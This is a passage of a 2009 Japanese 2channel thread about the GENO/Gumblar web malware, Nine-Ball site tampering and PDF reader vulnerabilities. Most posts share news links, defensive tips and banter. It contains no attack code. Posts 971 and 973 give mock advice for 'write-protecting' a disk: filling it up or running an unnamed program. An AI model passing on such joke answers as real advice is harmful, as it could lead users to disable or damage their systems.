862名無しさん@お腹いっぱい。:2009/06/16(火) 22:11:59
>>859
HP管理者への警告メール完了。
863859:2009/06/16(火) 22:35:28
>>862
お疲れ様です!
検索でも上の方に出て季節的にも踏む人がいるかもしれないから
ちょっと心配しながらも、ドメインへの接続ができなければ大丈夫かな?と
放置してしまってました。対応ありがとうございました。

意外なジャンルへも広まってますね・・・
864名無しさん@お腹いっぱい。:2009/06/17(水) 02:35:40
呪いのビデオの様に広まって行ってたみたいだから
ジャンルはあまり関係無いかと思われる
865名無しさん@お腹いっぱい。:2009/06/17(水) 14:16:11
新種のWebサイト改竄攻撃「Nine-Ball」…既に4万サイト以上で確認
ttp://internet.watch.impress.co.jp/docs/news/20090617_294384.html
866名無しさん@お腹いっぱい。:2009/06/17(水) 16:12:44
めんどくせーけどチョロメに変えようかな
867名無しさん@お腹いっぱい。:2009/06/17(水) 16:16:25
最近サイト改ざん多いなぁ
868名無しさん@お腹いっぱい。:2009/06/17(水) 16:23:15
GENOより強力な新型が出現したみたいだけど
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの?
↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  

〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
http://japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm

<抜粋>これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。
869名無しさん@お腹いっぱい。:2009/06/17(水) 16:51:09
5月に世界的大流行したJSRedir-R/Gumblarの教訓
http://itpro.nikkeibp.co.jp/article/COLUMN/20090611/331787/

今回利用されているパスワード・スティーラはws_32.dllをフックしているという。
ws_32.dllを悪用すると,例えば通信が発生した場合だけキー入力を
取得するように仕込むことができる。
つまり,システムがデータを暗号化する前に情報を詐取しているということだ。
このためSFTP(セキュア FTP)を利用していても,安全というわけではない。
870名無しさん@お腹いっぱい。:2009/06/17(水) 16:51:39
>>21
確実に治ってないな、それ
AcrobatReaderをどうにか消せないか?
実行部分だけでも起動しないように出来ればそれ以上被害は出ない
ただ感染したままだけど
871名無しさん@お腹いっぱい。:2009/06/17(水) 16:59:58
>>868
表示されないってのは表示領域が0なだけだとおもう
その文章だけじゃわかんないけど既存の脆弱性なら
最新バージョンの使用およびReaderのJavaScriptオフで大丈夫じゃないかな

つーかエロサイトはそれ以外もいろいろあるから心配なら控えましょう
控えるのが無理なら対策を勉強するかPCを投げ捨てれば大丈夫です

>>870
>>27
872名無しさん@お腹いっぱい。:2009/06/17(水) 17:03:16
>>866
いづれWindowsXP+クロームあたりも狙われるかもしれないから、
念のためにWindows7+クロームのユーザーエージェントを入れて使えよ
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5
これで貧弱なXPがWin7へと見た目だけ偽装できるw
873名無しさん@お腹いっぱい。:2009/06/17(水) 17:06:06
もうAdobeアンインストールしようかな
他になんか軽くて良いのがあったよね
874名無しさん@お腹いっぱい。:2009/06/17(水) 17:12:06
もうPDFとフラッシュは見れ無くてもいいよ
875名無しさん@お腹いっぱい。:2009/06/17(水) 17:13:45
まだfoxit readerに乗り換えてない情弱がいるのか
876名無しさん@お腹いっぱい。:2009/06/17(水) 17:19:01
877名無しさん@お腹いっぱい。:2009/06/17(水) 17:21:47
乗り換えた先のアプリに脆弱性が存在したら結局意味ないんだよな
せいぜい普及率の低さ逆手に取るくらいしかメリットがない
878名無しさん@お腹いっぱい。:2009/06/17(水) 17:22:55
>>875
>情弱がいるのか

つ【鏡】
879名無しさん@お腹いっぱい。:2009/06/17(水) 17:24:02
いちいち「情弱」って語に反応するなよ コンプ丸出し
880名無しさん@お腹いっぱい。:2009/06/17(水) 17:35:13
それ位でムキになんなよ
881名無しさん@お腹いっぱい。:2009/06/17(水) 17:40:45
確かにw
882名無しさん@お腹いっぱい。:2009/06/17(水) 17:45:19
>>879
何むきになってのwww
883名無しさん@お腹いっぱい。:2009/06/17(水) 17:47:17
なんだ図星か
884名無しさん@お腹いっぱい。:2009/06/17(水) 17:49:01
>>882
落ち着け
885名無しさん@お腹いっぱい。:2009/06/17(水) 17:52:37
別にfoxit readerがスタンダードじゃねーし
得体の知れないウィルスごときで皆で一斉に乗り換えるのも馬鹿らしいわな
886名無しさん@お腹いっぱい。:2009/06/17(水) 17:53:37
>得たいの知れないウィルスごときで
887名無しさん@お腹いっぱい。:2009/06/17(水) 17:55:16
何故コピペしなかった?
888名無しさん@お腹いっぱい。:2009/06/17(水) 17:56:07
888!
889名無しさん@お腹いっぱい。:2009/06/17(水) 18:18:46
>>887
技術不足
890名無しさん@お腹いっぱい。:2009/06/17(水) 18:20:53
技術不足かよw
891名無しさん@お腹いっぱい。:2009/06/17(水) 18:25:50
コンプティーク丸出しの意味がわからない
892名無しさん@お腹いっぱい。:2009/06/17(水) 18:47:14
>>889
勝手に返事するな
893名無しさん@お腹いっぱい。:2009/06/17(水) 18:48:02
ばかばっか
894名無しさん@お腹いっぱい。:2009/06/17(水) 18:50:11
>>893
何むきになってのwww
895名無しさん@お腹いっぱい。:2009/06/17(水) 18:51:38
なんだ図星か
896名無しさん@お腹いっぱい。:2009/06/17(水) 18:54:38
無限ループって怖くね?
897名無しさん@お腹いっぱい。:2009/06/17(水) 18:57:20
えっ
898名無しさん@お腹いっぱい。:2009/06/17(水) 18:57:41
きも
899名無しさん@お腹いっぱい。:2009/06/17(水) 19:03:17
さっきから情弱が必死になってるな
900名無しさん@お腹いっぱい。:2009/06/17(水) 19:04:24
情弱ってそんなに悪いことなのか?
901名無しさん@お腹いっぱい。:2009/06/17(水) 19:04:30
火狐とIEではしくみが違っているんだよな
一応、Adobeリーダーがpdfを自動で読み込まないように火狐とIEの設定を変えてみた
902名無しさん@お腹いっぱい。:2009/06/17(水) 19:05:38
>>899
何むきになってのwww
903名無しさん@お腹いっぱい。:2009/06/17(水) 19:05:43
ジェノウイルスはマジやばい
904名無しさん@お腹いっぱい。:2009/06/17(水) 19:05:59
>>876
genoウイルスでfoxit readerに乗り換えた時には修正されてたのか
905名無しさん@お腹いっぱい。:2009/06/17(水) 19:08:09
今後Adobeリーダーのどのような脆弱性を狙ってくるか解らないから自動読み込みは禁止だな
906名無しさん@お腹いっぱい。:2009/06/17(水) 21:12:26
PDF 閲覧ソフトいろいろ試したけど
Adobe Reader 以外だと表示が崩れることがあるから
基本的に Adobe Reader かなー
いったん起動してしまえば軽いし
907名無しさん@お腹いっぱい。:2009/06/17(水) 21:15:28
めったにつかわないんだから、Readerのプラグインだけやめればいい
問題はゼロにならないが、だいぶちがうとおもわれ

次スレもこのスレタイでいくん?
908名無しさん@お腹いっぱい。:2009/06/17(水) 22:26:24
ttp://iida.jp/calling/

genoどころかおそらくウィルスとは無関係だが
下手するとそれ以上にたちの悪いページ
一体、何考えてんだ?
909名無しさん@お腹いっぱい。:2009/06/17(水) 23:44:01
スクリプト全般を動作できないようにすれば解決するのにな
910名無しさん@お腹いっぱい。:2009/06/18(木) 00:05:02
>>847
ネタとして成立させるならこうだな


男A「僕のアナルが、GENOに感染しちゃったんだ・・・」
男B「何だって!?うほっ!それは大変だ!よし、ちょっと見てやるから今すぐお前の家に行くぞ」
911名無しさん@お腹いっぱい。:2009/06/18(木) 00:08:00
>>869
>つまり,システムがデータを暗号化する前に情報を詐取しているということだ。
>このためSFTP(セキュア FTP)を利用していても,安全というわけではない。
これは嘘か誤解か情報不足だな。
キーロガーのトリガとして使うって意味に取れるが、SFTPクライアントにパスワード記憶させてるケースなら、パスを抜けない。
記憶させなくとも、接続前にパスワードを先行入力した場合も抜けるかは怪しいな。
周辺を辞書化してアタックするのかね?
912名無しさん@お腹いっぱい。:2009/06/18(木) 00:28:48
9.1入れたらpdf見れなくなったから8に戻したよ
まじうぜーよ糞だなアドビ
913名無しさん@お腹いっぱい。:2009/06/18(木) 00:33:17
【社会】新種のWebサイト改竄攻撃「Nine-Ball」…既に4万サイト以上で確認
http://tsushima.2ch.net/test/read.cgi/newsplus/1245214783/
914名無しさん@お腹いっぱい。:2009/06/18(木) 00:45:23
レンタル鯖のファイルマネージャなら大丈夫という話を
聞きましたが、本当でしょうか?
915名無しさん@お腹いっぱい。:2009/06/18(木) 00:53:44
皿うどん食いてぇ
916名無しさん@お腹いっぱい。:2009/06/18(木) 01:04:06
917名無しさん@お腹いっぱい。:2009/06/18(木) 01:12:53
食いもんがネットで落ちてくるようになんねーかな
918名無しさん@お腹いっぱい。:2009/06/18(木) 01:54:37
今開発してるからもうちょっと待ってて
919名無しさん@お腹いっぱい。:2009/06/18(木) 03:42:12
ラーメンでけた
920名無しさん@お腹いっぱい。:2009/06/18(木) 08:51:22
これって情弱とか言ってる自称情強が結構感染してんだよな
921名無しさん@お腹いっぱい。:2009/06/18(木) 08:55:46
情弱って、板やスレの平均知識より低いとか煽りたい相手が自分より知識が劣ってる点を卑下する2ちゃん用語で
しかも特定の板でしか用いられないもんだから、進んで多用したがるような動機のある奴は
実際情報弱者の類に入るケースが多いんだよな
922名無しさん@お腹いっぱい。:2009/06/18(木) 12:56:00
今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ(米セキュリティ企業公表)

http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
923名無しさん@お腹いっぱい。:2009/06/18(木) 13:03:08
マルチうぜえよ
924名無しさん@お腹いっぱい。:2009/06/18(木) 13:09:48
XP IE8でも設定次第でGENOウイルスやナインボールは防げるよね
925名無しさん@お腹いっぱい。:2009/06/18(木) 13:15:33
>>924
情弱は他のブラウザやPDFリーダーなどに逃げる傾向にあるな
そして乗りかえた先の脆弱に陥るのが情弱でもあるがw
926名無しさん@お腹いっぱい。:2009/06/18(木) 13:21:29
ぜいじゃくじょうじゃくきじゃくせいー
927名無しさん@お腹いっぱい。:2009/06/18(木) 16:58:27
政府にせよ自治体にせよ交通各社にせよ、何でもかんでもpdfファイルにしてくれるもんだから、困る。
GENOウイルス云々以前に、重いんだが…ここまでpdfばっかなのは何でだ。
928名無しさん@お腹いっぱい。:2009/06/18(木) 17:33:49
>>927
それは閲覧する環境を整えるのに無駄な経費と無駄なライセンス料を払う必要が無いからだろ
なによりOSに依存しない電子ドキュメントを選ぶならPDFが一番扱いやすいわけだし今更選択肢など他には無い
929名無しさん@お腹いっぱい。:2009/06/18(木) 19:22:43
>>928
デシャビューがある
930名無しさん@お腹いっぱい。:2009/06/18(木) 21:30:34
契約書、拝見しました。ような気がします。昨日寝ながら。みたいな
931名無しさん@お腹いっぱい。:2009/06/18(木) 21:44:07
>>928
ああ、そうか…やっぱりそういう事情か…。
教えてくれて、ありがとう。
932名無しさん@お腹いっぱい。:2009/06/19(金) 00:31:59
余計な拡張機能をつけないでPSファイルをもっと推進してくれれば良かったのに。

余計な機能を追加し続けるから、ある程度新しいリーダを入れ続ける羽目になるし、
ある程度新しいと余計な機能ゆえに脆弱性も多くて神経質なアップデートを強要されるし、
神経質にアップデートしてもゼロデイ攻撃がゴロゴロ起きる上に対策がスクリプト機能を手動で殺してください、じゃどうにもならん。

昔からあるPNGとかJPGとかRIFFを見習って、コア機能と拡張機能は分離してパース出来るようにしろっての
933名無しさん@お腹いっぱい。:2009/06/19(金) 01:16:02
今更そんな事いってどうするよ。PDFのフォーマットが確率するまえにいっとけよ。
934名無しさん@お腹いっぱい。:2009/06/19(金) 01:37:22
今後も余計な機能を追加し続けるに1ペリカ
935名無しさん@お腹いっぱい。:2009/06/19(金) 01:50:37
冷蔵庫がつくのはいつになるかなwktk
936名無しさん@お腹いっぱい。:2009/06/19(金) 01:54:18
そのうちASIMOがPDFを読み上げるんだろ
937名無しさん@お腹いっぱい。:2009/06/19(金) 04:46:00
何か完全に収束したって感じね
938名無しさん@お腹いっぱい。:2009/06/19(金) 04:47:06
ジスレいらんよ
939名無しさん@お腹いっぱい。:2009/06/19(金) 05:04:40
MS 謹製の XPS の普及に期待
現状ではファイルサイズもビューアの重さも表示や印刷の品質もクソだけどw
940名無しさん@お腹いっぱい。:2009/06/19(金) 05:11:33
>>924
IE8は未対応のページが多いとい言う致命的な問題があるから論外
941名無しさん@お腹いっぱい。:2009/06/19(金) 05:58:55
>>910
ネタとしては成立してるけど、清廉なセキュ板のレスとしてはお下劣ですぅ><
スポーツ新聞のエロ面のワールドジョークとしてならバッチリ(^_^)v

そんなあなたに おすすめのスレ
http://pc11.2ch.net/test/read.cgi/sec/1242582100/
942名無しさん@お腹いっぱい。:2009/06/19(金) 06:08:19
くだらん
943名無しさん@お腹いっぱい。:2009/06/19(金) 06:58:37
>>938 とりあえず、次俺らどこに移動するん? だいたい落ち着いてるし、手堅くセキュ板?
944名無しさん@お腹いっぱい。:2009/06/19(金) 08:19:33
ってあれっ、ここがセキュ板か インターネッツ板かと

インターネッツ板のスレが、比較的ふいんきが近い 残り60%くらい
あるいは、zlkonウイルス擦れ ってのがこの板にあって、これが残り95%
945名無しさん@お腹いっぱい。:2009/06/19(金) 09:52:28
作った人ってもう捕まった?
946名無しさん@お腹いっぱい。:2009/06/19(金) 11:04:26
ウイルス上等

[email protected]
947名無しさん@お腹いっぱい。:2009/06/19(金) 11:35:52
>>946
童貞を卒業出来なくなる魔法をかけました。
948名無しさん@お腹いっぱい。:2009/06/19(金) 11:51:37
http://google.com/[email protected]
[email protected]の検索結果 15 件中 1 - 10 件目 (0.42 秒)
すっかり記録されてやんの。
949名無しさん@お腹いっぱい。:2009/06/19(金) 12:18:34
イタズラで晒されたんだろうね、ウイルスのかわりに、SPAMがわんさか来るよ お気の毒に
950名無しさん@お腹いっぱい。:2009/06/19(金) 13:58:20
他人のメールアドレスを晒してるんじゃね
951名無しさん@お腹いっぱい。:2009/06/19(金) 14:21:44
adobeに限らずPDF Readerのjavascript関連には脆弱性がたっぷり含まれていたわ
adobeはブラウザから無効にならなかったり、他のPDFはJSをOFFにしても無効にならない場面があったりする
セキュリティを固めたつもりがフヌケだったという、これらも脆弱性のひとつだろうな
952名無しさん@お腹いっぱい。:2009/06/19(金) 14:37:53
MS、無料ウイルス対策ソフトを23日公開
http://www.afpbb.com/article/environment-science-it/it/2613105/4282627
953名無しさん@お腹いっぱい。:2009/06/19(金) 14:55:37
またか。MS謹製の対策ソフトは弊害が多いからスカン。前に出たのはOEを壊されたりしたしな
954名無しさん@お腹いっぱい。:2009/06/19(金) 14:57:54
そんなことよりOSとかオフィスとか安くしろよ
955名無しさん@お腹いっぱい。:2009/06/19(金) 15:21:54
お断りします。
956名無しさん@お腹いっぱい。:2009/06/19(金) 16:21:00
>>954
個人が買うもんじゃないから。特にオフィス。
OSも定価では買わないw OS付きの中古かな
957名無しさん@お腹いっぱい。:2009/06/19(金) 16:26:31
お前がどこで買おうとどうでも良いよ
そんな話誰もしてないし興味ない
958名無しさん@お腹いっぱい。:2009/06/19(金) 18:11:51
また嘘クソ垂れ流しのテンプレで立てたな
よくやるわ
959名無しさん@お腹いっぱい。:2009/06/19(金) 23:19:26
GENOはもう良いだろ
960名無しさん@お腹いっぱい。:2009/06/19(金) 23:35:04
もういりまへんわ
961名無しさん@お腹いっぱい。:2009/06/19(金) 23:39:03
わてほんまによういわんわ
962名無しさん@お腹いっぱい。:2009/06/20(土) 00:17:34
             ,r‐―‐-、
           /      \
          /   ,ィ       ヽ
         i'   _.j_,j,rj_j,:、_ 、 l
         iト、._j'ji !! ァ-、 !j !;l! トヽ,    
          ( .`t.!!/ _!.ヽ='イi ,'  )     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          ヽヽ,j   ,--、  j r ィ~\   |  まだだっ!まだ終わらんよ!
           )ヽヽ. ゙=' /l  )ーi l <.  
           ゙t j `ー‐'  」  iト-'~i !.   \____________
           l  フ┬┬i'~二'iノ二ソノ.
           liブ ,i i !└┘!__//_
        _,.:ヴー、j__j__jr-‐‐'''ー----`エー、_
      _/ /   i' i' i'        /  \ ヽ
     / ト-'"   ,i' i' i'       /    ヽ. )
     i'  l!     !  ! !       j ,il   ,.r'~ヽ
    ,ト、 l     !  ! ,!       / i  / i  ノ
    ! ヽ,!     ! ! ゙i      ,i  レ'   ヽ ヽ
   ( j  '!     ! !  !       j   ,「  ,.:='',T゙イ
     エー-i、    j ,!  i!     l  /∧,/  ヽ. !
    .i!    \   ! !  !      ! ,i i ヽ   \!
    .i     k'   ! !  i.     j j i'  !    ヽ.
    !    ,ネ、  j 十==)j   ,ノ ! j   \    )
    ノj __, ,八  く__」_,.='子‐-ァ、」 //     ゙v'__!
   //   ,!  ] ̄く  く ̄ ̄~「「>'^Y      / ____)
  _凡、_  _ノ j_,.-‐'t‐‐'ナーt‐‐「j  l      レ'"    i
 l/~`ーニニj /   ,!ー十'"`T"~~^TT゙i     l     l
963名無しさん@お腹いっぱい。:2009/06/20(土) 01:25:11
JSオフ、iframe,フラッシュオフ、アドビリーダーアンインスコで不便でしゃーないわ
964名無しさん@お腹いっぱい。:2009/06/20(土) 02:37:00
>>963
JavaVMは消したかい?

あとまぁ、只のHTMLでも解釈ミスでやられるって例もあったし、JPGのデコードエラーで感染するってのもあったよな。


・・・1CD Linuxとか、CDブートWindowsとか、VMとか、ブラウジングはそういう環境でのみ実行するって決め打ちするほうが案外楽かもな
965名無しさん@お腹いっぱい。:2009/06/20(土) 04:23:59
>>859
もう無害化されてんの?
何も出ないんだけど。
966名無しさん@お腹いっぱい。:2009/06/20(土) 08:41:11
CDブン回してネット見るとかもうね
単に書き込み禁止にしてれば良いだろ
967名無しさん@お腹いっぱい。:2009/06/20(土) 13:16:55
テキストブラウザでいいよ
968名無しさん@お腹いっぱい。:2009/06/20(土) 13:18:36
>>966
usbなら速い
969名無しさん@お腹いっぱい。:2009/06/20(土) 15:40:45
>>961
買物ブギ
970名無しさん@お腹いっぱい。:2009/06/20(土) 18:32:03
>>966
無知な俺にHDDを書込み禁止にする方法を教えてくれ
971名無しさん@お腹いっぱい。:2009/06/20(土) 18:54:12
>>970
HDDを容量限界まで食い尽くせ。物理的に書き込みしたくても出来なくなる。
972名無しさん@お腹いっぱい。:2009/06/20(土) 19:12:49
>>970
アクセス権かな?
ファイルシステムによるんだろうけど
973名無しさん@お腹いっぱい。:2009/06/20(土) 20:47:38
>>970
nomore.comを実行。その後は書込めなくなる。
なにかを削除しちまえば書込めるのが嫌だっていうなら、物理的に引っこ抜け。
974名無しさん@お腹いっぱい。:2009/06/21(日) 00:28:52
>>971-973
皮肉で言ってるんだけどな・・・
ファイルサイズを食い尽くそうがファイルシステム側でロックしようが、ウィルス・マルウェアが攻撃目的で削除・変更するのを防げるわけではないだろ。
引っこ抜いたら読み込みも出来ねぇよ。

せめてReturnilを挙げる位してくれ。
975名無しさん@お腹いっぱい。:2009/06/21(日) 01:11:45
過剰反応
976名無しさん@お腹いっぱい。:2009/06/21(日) 07:48:05
>>974
悪意のある文章だw
罠にはめようと(ry
977名無しさん@お腹いっぱい。:2009/06/21(日) 07:51:53
>>974
防げるよ
978名無しさん@お腹いっぱい。:2009/06/21(日) 07:58:16
この数行のレスを生半可な知識で行うと大変な目にあう
979名無しさん@お腹いっぱい。:2009/06/21(日) 09:47:05
初心者向け、は終わったんだから、どうなろうとめいめい自分で始末しろってこった
露出しちゃうの以外は、どうにもならないってことはないだろ
980名無しさん@お腹いっぱい。:2009/06/21(日) 12:23:44
万年初心者に簡単で効果的な方法を教えたが
マジ疲れた…

てかフォルダとファイルの違いくらい分かれつーの
981名無しさん@お腹いっぱい。:2009/06/21(日) 13:02:57
厳密にはフォルダもファイルの一種です、
フォルダは特殊なファイルです
とは説明してあげないの?
982名無しさん@お腹いっぱい。:2009/06/21(日) 13:36:35
おっさんはフォルダのことをディレクトリと言います。
983名無しさん@お腹いっぱい。:2009/06/21(日) 14:05:35
フォルダ風のexeをクリックするのはエロおやじ
984名無しさん@お腹いっぱい。:2009/06/21(日) 18:26:21
>>981 ファイルとして開きたいお!とか言う人なら萌えられる
985名無しさん@お腹いっぱい。:2009/06/21(日) 18:34:28
もう全部ショートカット化して
デスクトップにアイコン並べれば良いと思うよ
986名無しさん@お腹いっぱい。:2009/06/21(日) 19:23:38
きたねぇなぁ
987名無しさん@お腹いっぱい。:2009/06/21(日) 20:12:28
>>985
でも画面が800×600では・・・
988名無しさん@お腹いっぱい。:2009/06/21(日) 21:00:33
デスクトップのアイコンが汚いので、マイコンピュータとゴミ箱だけ残して、あと全部Quick Launchへフォルダわけして置いている。
コレが意外とベンリでね。スタートメニューのショートカットも全部Quick Launchへ移動させているという。
989名無しさん@お腹いっぱい。:2009/06/21(日) 21:21:54
そうですか
990名無しさん@お腹いっぱい。:2009/06/21(日) 23:01:22
 ___
/ || ̄ ̄|| ┌―.┐/ ̄\
|.....||__||―|――|‐⌒’|`⌒ それからどした・・・
| ̄ ̄\三⊂/ ̄ ̄ ̄/〇
|    | ( ./     /

 __
/ || ̄./ ̄\.┌―.┐
|.....||_⌒’|`⌒‐|┰┰|―  それからどした!?
| ̄ ̄\三⊂/ ̄ ̄ ̄/
|    | ( ./     /

    / ̄\.┌―.┐♪
 __  ⌒’|`♪‐|┰┰|‐∩
/ || ̄ ̄|| r _. |⊂⊃| ノ  それからどした?
|.....||__|| └‐ ムムムムレ´`ヽ   それからどした?
| ̄ ̄\三  / ̄ ̄ ̄/ノ´` ♪
|    | ( ./     /

               / ̄\.
               ⌒’|`⌒
 ___        ♪  ∩┌―.┐
/ || ̄ ̄||         _  ヽ‐|┰┰|‐7   それからどした??
|.....||__||         /`ヽJ  ⊂⊃|┘   それからどした???
| ̄ ̄\三  / ̄ ̄ ̄/  ´`ヽ、ムムムム
|    | ( ./     /      `) ) ♪
991名無しさん@お腹いっぱい。:2009/06/22(月) 00:57:24
>>983
誰でも初心者の頃一回はやるものだと思ってた
992名無しさん@お腹いっぱい。:2009/06/22(月) 01:08:34
で、次スレはインターネット板の方か?

アフィテンプレのとこは無視の方向で。
993名無しさん@お腹いっぱい。:2009/06/22(月) 01:23:38
もういらん
994名無しさん@お腹いっぱい。:2009/06/22(月) 07:06:26
めいめいすきなところに移動汁 以下順不同

GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
http://pc11.2ch.net/test/read.cgi/sec/1245402584/

GENOウイルススレ 感染4台目
http://pc11.2ch.net/test/read.cgi/internet/1243050166/

zlkonウイルス擦れ
http://pc11.2ch.net/test/read.cgi/sec/1242623934/

http://find.2ch.net/?STR=GENO
995名無しさん@お腹いっぱい。:2009/06/22(月) 07:23:06
9.1.2がきたら表記帰るかと思ったらそうでもないのか
9.1.0でいいんですけどね
996名無しさん@お腹いっぱい。:2009/06/22(月) 07:54:44
>>994
(`д´ )ゞラジャ
997名無しさん@お腹いっぱい。:2009/06/22(月) 09:59:11
>>994
一番上はアフィ野郎のスレだから除外しとけ。
998名無しさん@お腹いっぱい。:2009/06/22(月) 12:22:36
次スレ
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
999名無しさん@お腹いっぱい。:2009/06/22(月) 12:42:25
    ∩___∩
    | ノ ,,.ノ ヽ、ヽ
   / u ―   ― |
   |    ( _●_) .|   困ったクマー
  彡、    ヽノ  ミ
 /     ∩ノ ⊃  ヽ
 (  \ / _ノ |  |
 .\ “  /__|  |       ○_○
 _ \ /___ /_____(´(エ)`)__コマッタクマー
 _ _ _ _ _ _ _ __U _U _ |
  | |  | | | |  | | | |  | |  | |  | |  | | | |
  | |  | | | |  | | | |  | |  | |  | |  | | | |
  | |  | | | |  | | | |  | |  | |  | |  | | | |
1000名無しさん@お腹いっぱい。:2009/06/22(月) 12:43:59
1000なら次々スレで「Vistaの人はは」が直りますように
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。